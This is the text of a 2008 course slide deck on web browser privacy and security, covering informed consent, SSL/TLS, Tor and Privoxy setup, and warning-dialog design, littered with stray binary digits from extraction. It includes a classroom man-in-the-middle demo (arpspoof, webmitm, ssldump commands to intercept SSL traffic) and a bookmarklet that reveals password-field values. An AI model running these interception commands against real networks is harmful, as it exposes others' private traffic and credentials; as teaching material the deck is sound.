Web Browser Privacy and Security Dhruv Mohindra (MSISPM) Usable Privacy Security, Spring 08

advertisement
1
1
1
0
0
0
0
1
1
0
1
1
1
1
0
1
1
0
1
1
0
1
1
0
0
1
1
1
1
0
0
1
1
1
1
1
1
1
1
1
0
1
1
0
1
0
1
1
1
1
1
0
1
1
0
Web Browser Privacy and
Security
1
0
1
1
0
Dhruv Mohindra (MSISPM)
Usable Privacy Security, Spring 08
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
Agenda
Web Browsing and 'The User'
 Technology Overview


Security Concerns

Privacy Matters
0

Recent Developments
1

Suggestions
1
1
1
1
1
0
0
0
1
1
1
1
1
1
Agenda
Web Browsing and 'The User'
 Technology Overview

1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1

Security Concerns
1

Privacy Matters

Recent Developments

Suggestions
0
1
0
1
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
A Model For Informed Consent
0
1
1
0
1
0
1
Source: Informed Consent by Design(Friedman, Lin, Miller)
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
1
Agreement Revisited...
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
0
1
0
1
On the other hand...
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
But with Web Browsers...
None of the approaches work
- One is too intrusive, the other too lax
 It is a good idea to reveal simple and required features

- The vast population just wants to browse the Internet
1
0

- Expose tutorials and links so that others are satisfied
1
0
1
Hide complexity underneath, advanced users can find it

Strike a trade-off between security and usability
- Recovering Stored Passwords in Firefox
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
1
Towards Better Usability...
Javascript:(
function()
{
var s,F,j,f,i; s = "";
F = document.forms;
for(j=0; j<F.length; ++j)
{
f = F[j];
for (i=0; i<f.length; ++i)
{
if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n";
}
}
if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There
are no passwords in forms on this page.");
}
)();
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
Agenda
Web Browsing and 'The User'
 Technology Overview


Security Concerns

Privacy Matters
0

Recent Developments
1

Suggestions
1
1
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
Secure Sockets Layer (SSL/TLS)
• Set of cryptographic protocols
that provide secure
communications on the
Internet, for applications
0
• Designed to protect from
eavesdropping, tampering,
replay and packet forgery.
1
• SSL/TLS Implementations do
not signify secure “places” but
security in 'transit'.
1
1
Image Source: http://www.windowsitpro.com
1
1
1
0
0
0
1
1
1
1
1
1
Agenda
Web Browsing and 'The User'
 Technology Overview

1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1

Security Concerns
1

Privacy Matters

Recent Developments

Suggestions
0
1
0
1
1
1
1
0
0
0
1
1
1
1
1
1
Exercise

1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
How many people feel that they are safe while browsing
non TLS(SSL)-enabled websites?
0
1
1
1

Have you every questioned someone about how SSL
works and how you are safe with it? Or do you take
technology for granted because everyone says “Use SSL
to browse securely”?
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
0
1
0
1
Demonstration
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
Man-in-the-middle Attack
0
1
1
0
1
0
1
Source: http://www.acm.org/crossroads/xrds11-1/gfx/figure2-wifi.jpg
1
1
1
0
0
0
1
1
1
1
1
1
Man-in-the-middle Attack

1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
SSL/TLS can be defeated with Social Engineering
Run the following commands (with permission)- $ arpspoof -t victim gateway
- $ arpspoof -t gateway victim
- $ echo 1 > /proc/sys/net/ipv4/ip_forward
- $ wireshark
- $ webmitm -dd
- $ ssldump -n -d -k webmitm.crt | tee ssldump.log
1
Where,
victim is the IP address of the victim computer
gateway is the IP address of the gateway
(arpspoof utility comes with the dsniff package)
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
Agenda
Web Browsing and 'The User'
 Technology Overview


Security Concerns

Privacy Matters
0

Recent Developments
1

Suggestions
1
1
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
Anonymous Browsing

- Hiding the IP address
- Disabling exchange of cookies
- Other personally identifiable information
0
1
1
1
What constitutes anonymity on the Internet?

TOR (The Onion Router)
- Routes traffic through three mix proxies by default
- The sender encrypts a message thrice
- Due to layered encryption, it is called Onion Routing
- You are safer as long people in your anonymity set
are non-identifiable
- TOR is a SOCKS proxy and thus requires Privoxy
- Privoxy handles http, https data and DNS lookups
then passes traffic to TOR via a SOCKS connection
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
0
1
0
1
TOR Caveats
False sense of completion
- Sometimes users mistakenly feel protected while they
are not
 Using TOR without Privoxy
- Configuring a browser to use TOR as its SOCKS
proxy doesn't work due to DNS lookups/leaks
 Execution of Client-side code
- Enabling Java, Javascript, Flash or ActiveX is very
dangerous.
 At first glance the whole system is difficult to grasp
- No clear description of how tor, Vidalia, Privoxy work
- No clear message that Privoxy is to run on port 8118
while TOR on 9050 (useful when configuring browser)

1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
FoxTor on Linux

Firefox extension using the web browser.
0
1
1
1
TOR, Privoxy and FoxTor installed gracefully
- Compiled source packages as usual and installed the

Configuration of Privoxy was tricky
- “forward-socks4a / 127.0.0.1:9050 .”, line had to be
added in /etc/privoxy/config. Not mentioned in docs.
- It would be nice to have FoxTor's 'help' have these
descriptions

Runtime Issues
- FoxTor continues to say “You are now Masked” even
when one has turned off either Privoxy or tor.
- The user may not realize the real source of the
problem and may try fiddling with FoxTor instead
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
Agenda
Web Browsing and 'The User'
 Technology Overview


Security Concerns

Privacy Matters
0

Recent Developments
1

Suggestions
1
1
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
0
1
0
1
Recent Developments

Context Sensitive Certificate Verification
- Clarify relationship between user and server
- Uses tokens and modifies web browsers
- Displays a series of alert boxes...complicated?
- Do you have information on removable media?
- Are you internal member of Org. that owns server?
- Doesn't help avoid dangers with public websites
- Denial of Service

Specific Password Warnings
- Alert user while sending unencrypted passwords
- Series of confirmation windows again...
- User Study participants are more careful when you
tell them “Do not visit websites you consider too
risky”
1
1
1
0
0
0
1
1
1
1
1
1
Agenda
Web Browsing and 'The User'
 Technology Overview

1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1

Security Concerns
1

Privacy Matters

Recent Developments

Suggestions
0
1
0
1
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
0
1
1
0
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
0
1
0
1
Context Sensitive Dialog Boxes
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
- Conveys the initial meaning without any verbose statements
0
0
0
- Tailor according to skill set of user, ask at browser installation time
1
1
1
- Change images while adapting to user's daily usage and preferences
1
1
1
0
1
1
0
1
0
Context Sensitive Dialog Boxes
0
1
1
1
- Covey application or website specific risk
- More intuitive and easy to understand
- Users can click 'x' to dismiss anytime
- 'Learn More' is default, curious users will click at first instinct
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
1
Conclusion
1
1
1
0
0
0
1
1
1
1
1
1
1
1
1
0
0
1
1
1
1
1
1
0
1
1
0
0
0
1
0
1
1
1
1
1
0
0
0
1
1
1
1
1
1
0
1
1
0
1
0
0
1
1
1
Questions
Download